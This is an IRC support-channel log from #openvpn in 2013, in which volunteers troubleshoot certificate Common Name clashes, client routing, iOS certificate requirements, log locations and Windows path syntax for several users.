, but its obvious i had to 16:30 <+pekster> I already noted this earlier 16:30 < hg_5> what is cert CN ? 16:30 < kothog> pekster: So I have a little script going which builds a filename from the CN of the cert and I have the static routes working just fine via the connect-client generic script (differentiating routes inside the script via the passed env variable "$common_name") So, thanks for the suggestion, that was superbly helpful. 16:30 < kothog> \o 16:31 < hg_5> and how you have reproduced this error? 16:31 <+pekster> hg_5: Follow the directions in the howto better next time. When you create your cert it asks you the "Comon Name". These *MUST* *NOT* match a currently valid cert 16:31 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 16:31 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 16:31 < hg_5> ahhh 16:31 <+pekster> kothog: Yup. When you can't do what you want, write code to do it 16:33 < hg_5> so KEY_CN must not be the same as KEY_OU ? 16:33 <+pekster> Don't ever set KEY_CN yourself 16:33 <+pekster> Ever 16:33 <+pekster> I mean, it's fine in the vars.bat file 16:33 <+pekster> But the scripts take care of that. You must CHANGE it. This is why is says "changeme" 16:33 < hg_5> "set KEY_CN=changeme" ;o? 16:34 < hg_5> ohh ok 16:34 <+pekster> This is also *very* chearly explained in the howto. Please go back and read it. Then read it again. Then do what it tells you 16:34 <+pekster> !howto 16:34 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 16:34 < kothog> pekster: I was getting into my time-wasting "stubborn" mode and about to modify openvpn source to allow route within a client config context, but the script method is much easier. lol 16:35 <+pekster> Yea. I don't know why it isn't supported, but I suppose you'd need to handle the odd case where someone edited the ccd file between client connect and client disconnect, and that's some ugly programatic changes 16:35 <+pekster> Eaiser to just give the user script hooks if one wants to do something out of the ordinary 16:35 <+pekster> kothog: Usually I just have the server get a 'route' statement in the main configuration to supernet any downstream client LANs I use 16:35 <+pekster> But, maybe your use-case is different, or can't be (easily) supernetted 16:40 < hg_5> pekster ,hm and what about this error can you reproduce it http://puu.sh/1W1jM ? 16:40 <+pekster> That's becuase your CN matches 16:40 <+pekster> Don't use a CN you've issued a cert before 16:41 <+pekster> In case you somehow forgot to read the link I've asked you to (twice) this should make it painfully obvious: 16:41 <+pekster> "Remember that for each client, make sure to type the appropriate Common Name when prompted, i.e. "client1", "client2", or "client3". Always use a unique common name for each client." 16:41 <+pekster> If you fail to do that, openssl will fail to issue your cert. You can hack openssl.cnf to allow it anyway, but I'm not goign to help you do that as it very bad practice. The openssl documentation can explain how if you really want to do this 16:42 < hg_5> ahhhh.... 16:42 <+pekster> Now please stop asking for help without reading the links I send. It makes me not interested in helping you in the future 16:45 < hg_5> thankss....... it works now! ahhh that should be simplier way to generate those certificates ;p 16:46 <+pekster> You mean the way the official documentation tells you to? Yes, yes it would. 16:46 < hg_5> you know some gui, that i click generate certificate and it generates ;d 16:46 <+pekster> !xca 16:46 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. or (#2) Example XCA PKI for OpenVPN(writeup pending): https://community.openvpn.net/openvpn/wiki/XCA 16:47 < kothog> pekster: Each client connecting is home to a number of subnets, not all of them necessarily related to one another, and all admin'd by different people, so we're using openvpn as a sort of hub-node to talk to each other. 16:47 <+pekster> You're free to use whatever method you like. Those aren't spported in the 'official' howtwo. If you aren't familiar with openssl (no offence, but you really aren't given this problem) then using unofficial tools can cause problems if you don't understand how they work 16:47 < hg_5> wow i didnt heard about this :D 16:47 <+pekster> I wrote my own CA management from scratch using bash. Then again, I know what I'm doing 16:48 <+pekster> kothog: Yea, I see. Either a bunch of disjoined routes in your server.cnf, or handle it on each node. Of course, pushing the routes to each node is problematic, unless you have magic to handle that on the backend too. And making sure routes don't collide is always fun when it's different people/groups maintaining them :P 16:49 <+pekster> Erm, server.conf* 16:50 -!- Eagleman [~Eagleman@5.45.183.189] has joined #openvpn 16:51 < kothog> pekster: Client-to-client routing is working via push routes, and iroute (I think iroutes are necessary), and then there are services on the server-side that the downstream subnets want to be able to access too. It's really our own fault for doing things so complicated. Some day I'd like to see a many:many participant openvpn that doesn't need the hub, and only requires one openvpn binary, but honestly if I'm not going to write it myself I don't have 16:51 < kothog> much business complaining. :) So I'm happy with our little frankenstein of a configuration. 16:51 < kothog> yeah, colliding routes, for sure. 16:55 <+pekster> Yup. with multi-threading, many:many might become an option since the TLS backend to identify clients uniquely is half the battle 16:55 <+pekster> Anyway, I'm out 16:55 -!- mode/#openvpn [-v pekster] by ChanServ 17:00 -!- adolfomaltez [~taro@190.62.211.253] has joined #openvpn 17:01 -!- gbkersey [~gbkersey@cpe-70-113-93-142.austin.res.rr.com] has quit [Ping timeout: 252 seconds] 17:03 -!- gbkersey [~gbkersey@cpe-70-113-93-142.austin.res.rr.com] has joined #openvpn 17:16 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has quit [Ping timeout: 256 seconds] 17:19 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 17:35 -!- Eagleman [~Eagleman@5.45.183.189] has quit [] 17:46 -!- gbkersey [~gbkersey@cpe-70-113-93-142.austin.res.rr.com] has left #openvpn ["Leaving"] 17:55 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn 17:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 17:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 17:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 18:04 -!- oyunokata [~rrinehart@209.163.177.130] has quit [Ping timeout: 252 seconds] 18:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 18:16 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 18:16 -!- mode/#openvpn [+o krzee] by ChanServ 18:21 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 18:23 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 18:33 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 18:40 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.] 18:44 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds] 18:56 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 19:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 19:06 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:37 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 245 seconds] 19:38 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 19:39 -!- raidz is now known as raidz_away 19:42 -!- prometheanfire [~promethea@gentoo/developer/prometheanfire] has left #openvpn [] 20:07 -!- Saviq_ [~Saviq@194.168.195.98] has joined #openvpn 20:09 -!- AsadH is now known as zz_AsadH 20:15 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer] 20:21 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 20:53 -!- julius_ [~julius@141.41.92.122] has quit [Ping timeout: 255 seconds] 20:58 -!- oyunokata [~rrinehart@71.21.227.159] has joined #openvpn 21:06 -!- oyunokata [~rrinehart@71.21.227.159] has quit [Quit: oyunokata] 21:47 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 264 seconds] 22:12 -!- adolfomaltez [~taro@190.62.211.253] has quit [Remote host closed the connection] 22:28 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 23:50 -!- Devastator- [~devas@186.214.111.148] has joined #openvpn 23:51 -!- Devastator- [~devas@186.214.111.148] has quit [Changing host] 23:51 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 23:51 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 252 seconds] --- Day changed Sat Feb 02 2013 00:48 -!- Saviq_ [~Saviq@194.168.195.98] has quit [Ping timeout: 248 seconds] 01:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 01:14 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn 01:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 01:40 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Ping timeout: 276 seconds] 01:43 -!- Porkepix [~Porkepix@157.138.76.100] has joined #openvpn 02:07 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [] 02:21 -!- Porkepix [~Porkepix@157.138.76.100] has quit [Ping timeout: 255 seconds] 02:24 -!- Porkepix [~Porkepix@79.31.185.239] has joined #openvpn 02:35 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has left #openvpn ["Once you know what it is you want to be true, instinct is a very useful device for enabling you to know that it is"] 03:48 -!- bauruine [~stefan@91.236.116.112] has quit [Read error: Connection reset by peer] 03:52 -!- Devastator- is now known as Devastator 04:00 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 04:02 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 240 seconds] 04:03 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 04:05 -!- dazo_afk is now known as dazo 04:05 -!- Devastator [~devas@177.18.198.246] has joined #openvpn 04:12 -!- _b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 04:16 -!- _b00b is now known as b00b 04:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 04:17 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 04:20 -!- Devastator [~devas@177.18.198.246] has quit [Changing host] 04:20 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 04:26 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 04:39 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has quit [Ping timeout: 260 seconds] 04:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 04:52 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 256 seconds] 04:53 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 04:55 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 04:57 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds] 04:57 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 04:58 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 244 seconds] 05:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:03 < hg_5> hello 05:07 -!- brute11k1 [~brute11k@89.249.231.86] has quit [Ping timeout: 255 seconds] 05:14 -!- brute11k [~brute11k@89.249.231.86] has joined #openvpn 05:21 -!- `Ile` [~ile@109-92-65-39.dynamic.isp.telekom.rs] has joined #openvpn 05:35 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Quit: leaving] 05:39 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 06:07 -!- julius_ [~julius@141.41.92.122] has joined #openvpn 06:22 -!- `Ile` [~ile@109-92-65-39.dynamic.isp.telekom.rs] has quit [Quit: Lost terminal] 06:23 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds] 06:26 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 06:46 -!- dazo is now known as dazo_afk 06:53 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 06:55 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"] 07:02 -!- master_of_master [~master_of@p57B52C3E.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 07:02 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 07:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:03 -!- master_of_master [~master_of@p57B5233B.dip.t-dialin.net] has joined #openvpn 07:17 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 07:26 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 07:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:45 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 07:54 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 07:55 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Client Quit] 08:03 -!- b1rkh0ff [~b1rkh0ff@178.77.20.138] has quit [Read error: Operation timed out] 08:03 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 256 seconds] 08:04 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 08:08 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 08:11 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 08:15 < hg_5> hello 08:17 -!- b1rkh0ff [~b1rkh0ff@178.77.15.65] has joined #openvpn 08:20 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Ping timeout: 264 seconds] 08:22 -!- mattock is now known as mattock_afk 08:24 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 08:26 < kisom> Is it possible to connect to a server on iOS without a client certificate? 08:27 < kisom> OpenVPN seems to require a client certificate to be selected... 08:27 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 08:30 -!- mode/#openvpn [+v pekster] by ChanServ 08:31 <+pekster> kisom: It's possible for a client to omit sending a certificate, yes (by omitting the --cert and --key options) but this is only valid if the server does not require them from clients (ie: --client-cert-not-required) 08:32 <+pekster> I haven't used the iOS GUI, but I assume you can also feed it a standard config file with the options/features you need? 08:32 <+pekster> (if the UI really doesn't support that) 08:33 < kisom> Yes, I imported a random certificate and private key that are signed by another CA, and not it works. 08:33 < kisom> s/not/now 08:34 <+pekster> Be aware that may be sent over the wire anyway (even if the server ignores it) so you are leaking any info that's encoded in the X509 file to anyone who can see your traffic. This may or may not be relevant 08:35 < kisom> It's not relevant in this case :) 08:35 <+pekster> I've got a nice write-up in the works explaining leakage and side-channel attacks (I call it a "social side-channel") by (ab)using this info :) 08:35 < kisom> My full name and email address is in the server certificate anyways 08:36 <+pekster> Yea, basically that. Companies sometimes include department, org name, etc. All useful if you're going to target someone to talk them into helping your compromise the infrastructure 08:36 <+pekster> Basically an adaptation of social engineering for the plaintext data you can swipe 08:37 < kisom> I gotta say the iOS client works very well 08:37 < kisom> Way better than the cisco client 08:38 * pekster has never been a fan of Cisco 08:38 < kisom> Well my company is selling VPN services to a huge company that needs to avoid censor in various countries 08:38 <+pekster> The design reaks of the same "Walled Garden" we've come to love/hate with another Giant Who Must Not Be Nammed 08:39 < kisom> Well I have nothing against cisco 08:39 < kisom> It's just that their client does not auto reconnect 08:39 < kisom> And it works badly behind old home routers 08:39 <+pekster> Heh, I'd say just patch the code, but you can't do that on iOS :P 08:40 <+pekster> Yea, OpenVPN certainly scores points for flexibility 08:40 < kisom> Well either way, it's time to get coding to have iOS support for our solution 08:58 < hg_5> hello, i have problem with openvpn ,can you look at this post http://www.gargoyle-router.com/phpbb/viewtopic.php?f=11&t=3802&p=16842#p16842 08:58 <@vpnHelper> Title: Gargoyle Forum View topic - openvpn client - doesnt redirect ip (at www.gargoyle-router.com) 09:04 <+pekster> How are you testing the external source IP? Also, are the 2 rfc1918 networks on a related backend, that is are they connected to each other locally, or are the on completely separate ISPs? 09:07 -!- mattock_afk is now known as mattock 09:08 < hg_5> im connecting with tl-wr1043nd and go on www.whatismyip.com 09:08 < hg_5> separate ISP 09:08 < hg_5> mifi router 3g has its own ISP and tomato openvpn server router has its own ISP 09:10 <+pekster> Server config, client logs (verb 4 please) and a copy of the client's routing table post-connection would be useful 09:10 <+pekster> Ideally in 'ip route' syntax, but 'route' or 'ifconfig' is acceptable if you lack modern-ish Linux tools (and upstream should be scolded for that) 09:13 < hg_5> tomato router server config: http://puu.sh/1WkLh http://puu.sh/1WkLP 09:14 < hg_5> can you tell what to type in router(through ssh) to get another informations ? 09:15 <+pekster> Ugh, stupid GUI frontends. No promisses on how accurate this is without raw configs, but since your other client works it's probably something client-side 09:15 <+pekster> !logs 09:15 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 09:15 <+pekster> No idea where your special box keeps logs. Usually syslog is common for daemons, except when otherwise redirected 09:16 <+pekster> '/sbin/ip route show' is usually sufficient to dump routing, if you have correct iproute2 support 09:16 < hg_5> you mean where tl-wr1043nd keeps logs? 09:16 <+pekster> Otherwise, 'route -n' is probably sufficient 09:17 <+pekster> Yes. I want client logs to see if something failed to happen that was supposed to 09:17 -!- mattock is now known as mattock_afk 09:17 <+pekster> Checking your logs is a pretty basic level of troubleshooting you should already before asking for help. Errors or warnings in the log is how openpvn tells you something is wrong, so it's pretty critical you look there 09:18 <+pekster> Most problems require inspecting these logs to confirm a problem, of confirm a lack of one 09:18 < hg_5> pekster http://puu.sh/1WkSJ 09:18 < hg_5> sorry, im not too much familiar with linux commands 09:19 < rob0> pekster, please lmk when your "social side-channel" write-up is ready. 09:19 <+pekster> routing table looks good; it's taking the --redirect-gateway push from the server, so traffic should be going out via tun0 to your VPN peer 09:20 <+pekster> rob0: Will-do. I'm probably going to put it under GFDL or similar. You planning to mirror it, or just want to read/link/reference it? 09:20 < rob0> read, maybe comment 09:21 <+pekster> hg_5: If you do a ping to say 4.2.2.1 (or some public host) and tcpdump traffic, can you see it going over tun0 instead of br-lan? (if that thing lacks tcpdump, you can do a 'poor mans tcpdump' with some iptables rules, like 'iptables -t mangle -A POSTROUTING -o tun0 -d 4.2.2.1' and check the hitcount as you ping that IP 09:22 <+pekster> rob0: Sure. I need to pretify an "official" link, but I'll have an unofficial one ready before that. I'll PM you that, although I'd rather limit distribution until I can get context/licensing/etc sorted out for the final version 09:23 < rob0> np, thanks 09:27 -!- mattock_afk is now known as mattock 09:31 < hg_5> pekster what exactly to check, that last command? 09:32 < hg_5> i can't ping 10.9.0.1 neither 192.168.1.1 (those ips are my router tomato) 09:37 <+pekster> Firewall perhaps? 09:38 <+pekster> Could be not properly allowing traffic to flow over tun0 on your client, or the server not accepting pings or input on its tun iface; if your other client can ping the vpn peer (10.9.0.1) then you know your issue must be firewall on this client 09:49 -!- idlecool [~i@sd.gs] has joined #openvpn 09:49 < idlecool> i am trying to install openvpn server 09:50 < idlecool> the server is not starting, i guess there should be logs somewhere. but unable to find it. 09:50 < idlecool> i am on ubuntu 12.04 09:50 < rob0> !logs 09:50 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 09:50 < rob0> !logfile 09:50 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info 09:56 < idlecool> /var/log/syslog is empty. 09:58 < rob0> If you have deleted your logfile while the syslogd is running, the logs are still being written to the deleted inode. Try restarting your syslogd? 10:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 10:03 -!- oneb [~oneb@99-101-240-158.lightspeed.tulsok.sbcglobal.net] has joined #openvpn 10:03 < oneb> any support avail for connecting on windows 8? 10:04 -!- mattock is now known as mattock_afk 10:05 < idlecool> rob0: got it. thanks, i was looking for wrong package to install, in ubuntu its sysklogd 10:05 < oneb> !paste 10:05 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 10:06 < oneb> !configs 10:06 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 10:06 < idlecool> i am not quite sure what this means 10:06 < idlecool> "NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables" 10:07 < oneb> I have everything set to run as admin. Windows 8 64-bit. http://pastebin.com/bmVrWwxT is my current log. 10:07 < oneb> I've been using OpenVPN for quite some time now, just now runing into problems with win8. 10:07 <+pekster> idlecool: If you use directives that call external scripts (such as --up, --down, --client-connect) you need to set --script-security as required to give it permission to run. See further details in the manpage under --script-security 10:08 < rob0> it is a NOTE, not an error 10:10 <+pekster> oneb: I'm guessing a problem with absolute/relateive paths, so verify --cd lines, and when in doubt try it with absolute pathes first. It could be weirdness with filesystem views if Win8 does what Vista pre-SP1 did by letting non-admin users (or admins when not engaging UAC) store files in "common" areas and put it in a user overlay transarently 10:10 <+pekster> UAC is worse than SELinux since it won't even tell you it's doing some of this voodoo 10:11 < oneb> I've disabled UAC and factory firewall. Running all .exe's as admin. 10:12 <+pekster> Try absoltue paths? --ca "C:\\program files\\openvpn\\config\\keys\\ca.crt" (or whatever the relevant path is?) 10:12 <+pekster> Windows may play nice with the forward-slash syntax, although I haven't tried that. It likes backslashes natively, and you must escape them, and then quote names with spaces in addition 10:15 -!- oneb [~oneb@99-101-240-158.lightspeed.tulsok.sbcglobal.net] has quit [] 10:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 10:34 -!- dazo_afk is now known as dazo 10:34 -!- novaflash is now known as novaflash_away 10:49 -!- novaflash_away is now known as novaflash 10:50 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 252 seconds] 10:59 -!- dazo is now known as dazo_afk 11:02 <@krzee> !winpath 11:02 <@vpnHelper> "winpath" is (#1) Remember on Windows to quote pathnames and use double backslashes, e.g.: "C:\\Program Files\\OpenVPN\\config\\foo.key" or (#2) also, you can use forward slashes to avoid needing double backslashes, but you still need quotes, e.g.: C:/Program Files/OpenVPN/config/foo.key (but surrounded by quotes) 11:02 <@krzee> it does work with forward slashes, but still must quote 11:03 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Ping timeout: 248 seconds] 11:03 <+pekster> That just looks screwy :P 11:04 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 11:04 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 11:05 -!- wh1p_ [~wh1p@host-2-100-148-6.as13285.net] has joined #openvpn 11:05 < wh1p_> test? 11:06 <@krzee> srs? 11:06 -!- wh1p_ [~wh1p@host-2-100-148-6.as13285.net] has quit [Client Quit] 11:09 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Quit: Bye] 11:09 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Ping timeout: 248 seconds] 11:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out] 11:25 -!- dmz [~dmz@unaffiliated/dmz] has quit [Quit: Ex-Chat] 11:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 11:32 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 11:34 -!- rob0 [rob0@harrier.slackbuilds.org] has joined #openvpn 11:34 -!- rob0 [rob0@harrier.slackbuilds.org] has quit [Changing host] 11:34 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 11:40 -!- brute11k1 [~brute11k@89.249.231.17] has joined #openvpn 11:41 -!- brute11k [~brute11k@89.249.231.86] has quit [Ping timeout: 260 seconds] 12:06 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 276 seconds] 12:19 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn 12:32 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 12:38 -!- mndo [~mndo@bl15-208-101.dsl.telepac.pt] has joined #openvpn 12:44 <+EugeneKay> srs. 12:46 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 12:46 < Maverick0984> anyone have an implementation of OpenVPN that uses PhoneFactor? 12:49 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn 12:49 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 12:59 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 13:03 -!- bjh4 [~bjh4@67.87.105.111] has joined #openvpn 13:05 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 13:09 -!- MeanderingCode [~Meanderin@173-12-200-221-Albuquerque.hfc.comcastbusiness.net] has joined #openvpn 13:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:35 -!- mndo [~mndo@bl15-208-101.dsl.telepac.pt] has quit [Ping timeout: 248 seconds] 13:35 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 13:45 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 13:59 -!- 45PABRYG3 [~grey@cpe-76-171-192-216.socal.res.rr.com] has quit [Read error: Connection reset by peer] 14:13 -!- mythos [~mythos@unaffiliated/mythos] has joined #openvpn 14:15 < mythos> hello there. i'm used to create client certificates with "source ./vars && ./build-key ". but the crt-file is now an empty. i'm using a debian 7 with openvpn 2.2.8. any suggestions? 14:15 < mythos> s/an// 14:50 -!- brute11k1 [~brute11k@89.249.231.17] has quit [Quit: Leaving.] 14:57 < hg_5> client1.crt is empty? 14:57 < hg_5> mythos 14:58 < hg_5> pastebin your vars.bat configuration 15:05 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has quit [Ping timeout: 256 seconds] 15:06 <@krzee> i suggest using a real version of openvpn 15:06 <@krzee> :D 15:08 <@krzee> seeing as 2.2.8 has never, and hopefully will never exist 15:08 <@krzee> (that would be a whole lot of new bugs found in 2.2.2) 15:11 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 15:12 <+EugeneKay> I like how this is going 15:13 <@krzee> Maverick0984, whats phonefactor? 15:13 <@krzee> EugeneKay, how whats going? 15:13 <+EugeneKay> The bullshit-o-meter. 15:16 <@krzee> =] 15:19 < hg_5> hm i still have problem with router tl-wr1043nd it can't redirect ip when connected to tomato router with open vpn server 15:19 < hg_5> .... 15:20 <@krzee> !logs 15:20 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 15:20 <@krzee> !configs 15:20 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 15:20 <@krzee> @ hg_5 ^ 15:21 -!- valparaiso [~valparais@pdpc/supporter/student/valparaiso] has joined #openvpn 15:22 < hg_5> tomato 1: http://puu.sh/1Wu43, tomato 2: http://puu.sh/1Wu4z , tl-wr1043nd client config: http://pastebin.com/76Drczwj 15:22 <@krzee> oh hell no 15:22 <@vpnHelper> Title: puush / home (at puu.sh) 15:23 <@krzee> dunno what those images are, but: 15:23 <@krzee> !router 15:23 <@vpnHelper> "router" is if you are using one of those hacked up linksys linux routers, and you are not logging... dont expect help until you turn on logging so you can post them 15:23 <@krzee> goes for configs too 15:23 <@krzee> of course if someone else wants to deal with it, thats fine 15:23 -!- Cpot-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 15:23 <@krzee> me, i only support openvpn, and openvpn has no gui 15:24 <@krzee> in your client config, lines 7 and 17 are the same thing 15:24 <@krzee> ill check back for server config and logs 15:26 -!- Cpt-Oblivious 